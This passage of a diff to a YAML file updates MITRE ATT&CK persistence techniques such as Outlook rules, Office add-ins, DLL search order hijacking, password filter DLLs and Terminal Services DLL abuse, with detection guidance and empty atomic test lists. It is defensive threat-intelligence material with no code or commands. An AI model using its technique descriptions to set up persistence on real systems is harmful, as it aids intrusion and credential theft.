-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: SensePost Ruler GitHub
+        description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange
+          services. Retrieved February 4, 2019.'
+        url: https://github.com/sensepost/ruler
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Office Application Startup
-      description: |-
-        Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.
-
-        A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      x_mitre_detection: |-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
-        Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-      x_mitre_version: '1.3'
+        url: https://github.com/sensepost/notruler
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'File: File Creation'
-      - 'Application Log: Application Log Content'
-      - 'Windows Registry: Windows Registry Key Modification'
-      - 'File: File Modification'
-      - 'Module: Module Load'
-      - 'Process: Process Creation'
-      - 'Windows Registry: Windows Registry Key Creation'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1137
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -28857,6 +29232,7 @@ persistence:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -28867,6 +29243,7 @@ persistence:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -28875,13 +29252,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -28923,9 +29300,6 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -28993,19 +29367,18 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -29021,8 +29394,8 @@ persistence:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -29036,7 +29409,7 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -29062,6 +29435,10 @@ persistence:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -29089,42 +29466,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -29139,13 +29485,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -29153,11 +29504,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -29188,7 +29562,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -29226,13 +29600,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -29258,7 +29630,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -29300,7 +29672,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -29378,11 +29749,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29462,35 +29832,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -29514,71 +29859,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -29587,24 +29921,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -29696,8 +30062,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -29728,71 +30094,139 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests: []
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
